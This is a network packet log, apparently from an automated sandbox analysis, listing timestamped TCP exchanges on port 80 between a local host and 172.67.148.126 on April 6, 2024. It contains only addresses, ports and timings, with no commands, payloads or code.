                                                Apr 6, 2024 09:30:44.393759012 CEST8049823172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:44.393898010 CEST4982380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:44.518663883 CEST8049823172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:44.762161970 CEST8049823172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:44.762267113 CEST8049823172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:44.762331009 CEST4982380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:44.762367010 CEST4982380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:44.886682034 CEST8049823172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:44.915709972 CEST4982480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.039701939 CEST8049824172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.039860964 CEST4982480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.042074919 CEST4982480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.165775061 CEST8049824172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.165846109 CEST4982480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.290060997 CEST8049824172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.534812927 CEST8049824172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.534953117 CEST8049824172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.535015106 CEST4982480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.535073042 CEST4982480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.658957005 CEST8049824172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.671329975 CEST4982580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.795756102 CEST8049825172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.799382925 CEST4982580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.801532984 CEST4982580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:45.925749063 CEST8049825172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:45.927334070 CEST4982580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:46.051652908 CEST8049825172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:46.311472893 CEST8049825172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:46.311486959 CEST8049825172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:46.311531067 CEST4982580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:46.315598965 CEST4982580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:46.443289995 CEST8049825172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:46.462117910 CEST4982680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:46.589709997 CEST8049826172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:46.589840889 CEST4982680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:46.592041969 CEST4982680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:46.717345953 CEST8049826172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:46.717474937 CEST4982680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:46.842045069 CEST8049826172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.092871904 CEST8049826172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.093091011 CEST4982680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:47.093346119 CEST8049826172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.093398094 CEST4982680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:47.218019009 CEST8049826172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.234719038 CEST4982780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:47.358977079 CEST8049827172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.359118938 CEST4982780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:47.361320972 CEST4982780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:47.484977961 CEST8049827172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.485132933 CEST4982780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:47.608577013 CEST8049827172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.897085905 CEST8049827172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.897269964 CEST4982780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:47.897469044 CEST8049827172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:47.897524118 CEST4982780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.023000002 CEST8049827172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.053819895 CEST4982880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.179337978 CEST8049828172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.179460049 CEST4982880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.181653976 CEST4982880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.305964947 CEST8049828172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.306097031 CEST4982880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.430571079 CEST8049828172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.690085888 CEST8049828172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.690260887 CEST4982880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.690376997 CEST8049828172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.690429926 CEST4982880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.814973116 CEST8049828172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.829344034 CEST4982980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.955138922 CEST8049829172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:48.955225945 CEST4982980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:48.957387924 CEST4982980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.081886053 CEST8049829172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:49.081947088 CEST4982980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.207077026 CEST8049829172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:49.472393036 CEST8049829172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:49.472501993 CEST4982980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.473009109 CEST8049829172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:49.473057032 CEST4982980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.596791029 CEST8049829172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:49.608642101 CEST4983080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.732923031 CEST8049830172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:49.733088970 CEST4983080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.735328913 CEST4983080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.859934092 CEST8049830172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:49.860052109 CEST4983080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:49.984110117 CEST8049830172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:50.249002934 CEST8049830172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:50.249114990 CEST4983080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:50.249672890 CEST8049830172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:50.249728918 CEST4983080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:50.373356104 CEST8049830172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:50.389012098 CEST4983180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:50.513509989 CEST8049831172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:50.513772964 CEST4983180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:50.516268969 CEST4983180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:50.652935982 CEST8049831172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:50.653028965 CEST4983180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:50.777252913 CEST8049831172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.033349037 CEST8049831172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.033489943 CEST8049831172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.033564091 CEST4983180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.033564091 CEST4983180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.161230087 CEST8049831172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.186696053 CEST4983280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.312093019 CEST8049832172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.312350988 CEST4983280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.314444065 CEST4983280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.438668966 CEST8049832172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.438863039 CEST4983280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.562994003 CEST8049832172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.821953058 CEST8049832172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.822046995 CEST8049832172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.822208881 CEST4983280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.822208881 CEST4983280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:51.946485043 CEST8049832172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:51.969448090 CEST4983380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.093905926 CEST8049833172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.093998909 CEST4983380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.096159935 CEST4983380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.221084118 CEST8049833172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.221276999 CEST4983380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.345475912 CEST8049833172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.595098019 CEST8049833172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.595221996 CEST4983380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.595623016 CEST8049833172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.595741034 CEST4983380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.719275951 CEST8049833172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.738703966 CEST4983480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.862714052 CEST8049834172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.862808943 CEST4983480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.865138054 CEST4983480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:52.989810944 CEST8049834172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:52.989932060 CEST4983480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:53.113814116 CEST8049834172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:53.373054981 CEST8049834172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:53.373158932 CEST8049834172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:53.373215914 CEST4983480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:53.373323917 CEST4983480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:53.497209072 CEST8049834172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:53.514619112 CEST4983580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:53.639394999 CEST8049835172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:53.639555931 CEST4983580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:53.641649961 CEST4983580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:53.769198895 CEST8049835172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:53.769378901 CEST4983580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:53.893656969 CEST8049835172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.149101973 CEST8049835172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.149226904 CEST4983580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:54.149319887 CEST8049835172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.149363995 CEST4983580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:54.273849010 CEST8049835172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.296710968 CEST4983680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:54.420319080 CEST8049836172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.420440912 CEST4983680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:54.422589064 CEST4983680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:54.546200037 CEST8049836172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.546266079 CEST4983680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:54.669842005 CEST8049836172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.946742058 CEST8049836172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.946878910 CEST4983680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:54.947458029 CEST8049836172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:54.947514057 CEST4983680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.070353985 CEST8049836172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.092863083 CEST4983780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.217751980 CEST8049837172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.217823982 CEST4983780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.220104933 CEST4983780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.344584942 CEST8049837172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.344695091 CEST4983780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.469290018 CEST8049837172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.725775957 CEST8049837172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.725898981 CEST8049837172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.725899935 CEST4983780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.725938082 CEST4983780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.850384951 CEST8049837172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.871936083 CEST4983880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.995872021 CEST8049838172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:55.995965004 CEST4983880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:55.998033047 CEST4983880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:56.121817112 CEST8049838172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:56.121968031 CEST4983880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:56.245847940 CEST8049838172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:56.498783112 CEST8049838172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:56.498930931 CEST8049838172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:56.499044895 CEST4983880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:56.499046087 CEST4983880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:56.623030901 CEST8049838172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:56.645720005 CEST4983980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:56.769973993 CEST8049839172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:56.770073891 CEST4983980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:56.772335052 CEST4983980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:56.896563053 CEST8049839172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:56.896739006 CEST4983980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:57.020937920 CEST8049839172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:57.295444965 CEST8049839172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:57.295584917 CEST8049839172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:57.295645952 CEST4983980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:57.322300911 CEST4983980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:57.446536064 CEST8049839172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:57.466577053 CEST4984080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:57.590815067 CEST8049840172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:57.591036081 CEST4984080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:57.593507051 CEST4984080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:57.717737913 CEST8049840172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:57.717902899 CEST4984080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:57.842037916 CEST8049840172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:58.094893932 CEST8049840172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:58.094990015 CEST4984080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:58.095091105 CEST8049840172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:58.095139980 CEST4984080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:58.219307899 CEST8049840172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:59.800259113 CEST4984180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:59.925560951 CEST8049841172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:30:59.925698996 CEST4984180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:30:59.991734028 CEST4984180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:00.115789890 CEST8049841172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:00.115890980 CEST4984180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:00.239835024 CEST8049841172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:00.493268013 CEST8049841172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:00.493495941 CEST4984180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:00.493552923 CEST8049841172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:00.493639946 CEST4984180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:00.617388010 CEST8049841172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:00.643373013 CEST4984280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:00.767209053 CEST8049842172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:00.767308950 CEST4984280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:00.769505024 CEST4984280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:00.893496037 CEST8049842172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:00.893640995 CEST4984280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:01.017385960 CEST8049842172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:01.281761885 CEST8049842172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:01.281917095 CEST8049842172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:01.282001972 CEST4984280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:01.283277035 CEST4984280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:01.405986071 CEST8049842172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:01.420500040 CEST4984380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:01.544548035 CEST8049843172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:01.544631004 CEST4984380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:01.546958923 CEST4984380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:01.670851946 CEST8049843172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:01.670955896 CEST4984380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:01.794930935 CEST8049843172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.058294058 CEST8049843172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.058315992 CEST8049843172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.058427095 CEST4984380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.058468103 CEST4984380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.183892965 CEST8049843172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.206125975 CEST4984480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.330610991 CEST8049844172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.330699921 CEST4984480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.332844973 CEST4984480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.457050085 CEST8049844172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.457158089 CEST4984480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.581681967 CEST8049844172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.836838961 CEST8049844172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.837030888 CEST8049844172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.837107897 CEST4984480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.837403059 CEST4984480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:02.961693048 CEST8049844172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:02.993062019 CEST4984580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.117464066 CEST8049845172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:03.117774963 CEST4984580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.119856119 CEST4984580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.243938923 CEST8049845172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:03.244040012 CEST4984580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.368280888 CEST8049845172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:03.618990898 CEST8049845172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:03.619132996 CEST4984580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.619349957 CEST8049845172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:03.619401932 CEST4984580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.747432947 CEST8049845172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:03.765621901 CEST4984680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.889533043 CEST8049846172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:03.889610052 CEST4984680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:03.891736984 CEST4984680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.015767097 CEST8049846172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:04.015881062 CEST4984680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.139799118 CEST8049846172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:04.394763947 CEST8049846172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:04.394932985 CEST4984680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.395667076 CEST8049846172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:04.395711899 CEST4984680192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.518757105 CEST8049846172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:04.531620026 CEST4984780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.656651020 CEST8049847172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:04.656847954 CEST4984780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.659571886 CEST4984780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.784498930 CEST8049847172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:04.784728050 CEST4984780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:04.909006119 CEST8049847172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.165330887 CEST8049847172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.165555000 CEST4984780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:05.165723085 CEST8049847172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.165818930 CEST4984780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:05.289995909 CEST8049847172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.314891100 CEST4984880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:05.439578056 CEST8049848172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.439732075 CEST4984880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:05.441891909 CEST4984880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:05.566745043 CEST8049848172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.566822052 CEST4984880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:05.691210032 CEST8049848172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.937047005 CEST8049848172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.937230110 CEST4984880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:05.937576056 CEST8049848172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:05.937628031 CEST4984880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.061656952 CEST8049848172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.079605103 CEST4984980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.204020023 CEST8049849172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.204171896 CEST4984980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.206379890 CEST4984980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.330943108 CEST8049849172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.331012964 CEST4984980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.457076073 CEST8049849172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.734194040 CEST8049849172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.734266996 CEST8049849172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.734457016 CEST4984980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.734457016 CEST4984980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.858865023 CEST8049849172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.872936010 CEST4985080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.996922970 CEST8049850172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:06.997039080 CEST4985080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:06.999341011 CEST4985080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:07.123207092 CEST8049850172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:07.123332977 CEST4985080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:07.247222900 CEST8049850172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:07.492587090 CEST8049850172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:07.492676973 CEST8049850172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:07.492779016 CEST4985080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:07.495273113 CEST4985080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:07.620208979 CEST8049850172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:07.642184973 CEST4985180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:07.765971899 CEST8049851172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:07.766056061 CEST4985180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:07.768548965 CEST4985180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:07.892277002 CEST8049851172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:07.892378092 CEST4985180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:31:08.016169071 CEST8049851172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:31:08.281070948 CEST8049851172.67.148.126192.168.2.6
